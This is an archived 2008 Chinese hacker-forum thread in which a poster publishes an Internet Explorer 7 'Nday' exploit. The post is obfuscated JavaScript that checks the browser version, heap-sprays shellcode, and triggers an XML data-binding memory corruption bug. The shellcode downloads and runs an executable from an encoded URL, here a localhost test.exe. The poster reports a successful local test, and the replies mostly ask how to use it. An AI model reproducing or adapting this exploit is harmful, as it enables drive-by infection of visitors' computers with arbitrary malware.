【3.A.S.T】网络安全爱好者's Archiver

黑客学习

柔肠寸断 发表于 2008-12-10 14:34

公布下这个ie7 Nday吧 ...

[color=#88520][font=Arial][size=12px]<script language="javascript">
[color=#000000]document.write("[url=http://hi.baidu.com/airpig]http://hi.baidu.com/dieinsky[/url]") [/color]
if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x69\x65 \x37")==-1)
location.replace("\x61\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B");
</script><script>function sleep(milliseconds) {var start = new Date().getTime(); for (var i = 0; i < 1e7; i++) { if ((new Date().getTime() - start) > milliseconds){      break;    }}} function spray(sc) { var bwkbnwvojsqweyvwgabdlie = 0x0a0a0a0a; var bwkbnwvojsqweyvwgabdlieyqfbygrgz=unescape; var asdfkj129312asdfasd = bwkbnwvojsqweyvwgabdlieyqfbygrgz(sc); var heapBlockSize = 0x100000; var payLoadSize = asdfkj129312asdfasd.length * 2; var szlong = heapBlockSize -(payLoadSize+0x038); var retVal = bwkbnwvojsqweyvwgabdlieyqfbygrgz("%u0a0a%u0a0a"); retVal = getSampleValue(retVal,szlong);    aaablk = (bwkbnwvojsqweyvwgabdlie - 0x100000)/heapBlockSize;    zzchuck = new Array();    for (i=0;i<aaablk;i++) {       zzchuck[i] = retVal + asdfkj129312asdfasd; } }   function getSampleValue(retVal, szlong) {   while(retVal.length*2<szlong) {         retVal += retVal; }    retVal = retVal.substring(0,szlong/2); return retVal; } var a1="%u";spray("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff[color=#ff0000]%u7468%u7074%u2f3a%u312f%u3732%u302e%u302e%u312e%u742f%u7365%u2e74%u7865%u0065[/color]"); sleep(5000);nav=navigator.userAgent.toLowerCase(); if (navigator.appVersion.indexOf('MSIE')!=-1) {   version=parseFloat(navigator.appVersion.split('MSIE')[1]) } if (version==7) {   w2k3 = ((nav.indexOf('windows nt 5.2')!=-1) || (nav.indexOf('windows 2003')!=-1));   wxp = ((nav.indexOf('windows nt 5.1')!=-1) || (nav.indexOf('windows xp')!=-1));     if (wxp||w2k3)    document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://rਊr.test.com src=[color=#0000ff]http://hi.baidu.com/dieinsky[/color]]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');      var i=1;   while ( i <= 10 )    {    window.status=" ";i++;   } }   </script>

[color=#ff0000]%u7468%u7074%u2f3a%u312f%u3732%u302e%u302e%u312e%u742f%u7365%u2e74%u7865%u0065[/color]
[color=#ff0000][color=#333399]对应地址[/color]:[url=http://127.0.0.1/test.exe]http://127.0.0.1/test.exe[/url][/color]

[color=#000000][b]本机测试success[/b][/color]
[/size][/font][/color]

paomo86 发表于 2008-12-10 14:56

:L   一个字   迷糊!
呵呵

超超 发表于 2008-12-10 18:11

3个字 很迷糊

1022615 发表于 2008-12-10 20:42

4个字超级迷糊:victory: :lol

hilarylove 发表于 2008-12-16 01:07

我知道都是写字符来的,一个一个看我懂的。

img527 发表于 2008-12-16 16:33

迷糊啊,:time:
怎么用呢。。。

闲逛 发表于 2009-1-15 20:04

.m (45). 啥叫Nday?

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.